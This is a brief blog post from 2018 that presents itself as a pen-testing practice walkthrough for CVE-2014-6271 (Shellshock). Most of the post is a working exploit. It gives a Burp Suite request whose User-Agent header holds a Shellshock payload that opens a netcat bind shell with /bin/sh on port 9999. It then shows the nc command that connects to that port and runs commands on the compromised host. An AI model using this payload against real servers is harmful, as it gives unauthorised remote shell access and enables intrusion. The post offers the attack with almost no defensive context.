Sunday, December 23, 2018

CVE-2014-6271 walk through

when practicing pen testing on CVE-2014-6271

Burp Suite proxy, repeater, modify user agent


GET / HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh

the repeater will not return because it's waiting for a connection now

open another prompt and launch netcat to connect to port 9999

nc xxx.xxx.xxx.xxx 9999

you are now at the /bin/sh prompt for the compromised system so you can type a command like

"whoami"

No comments:

Post a Comment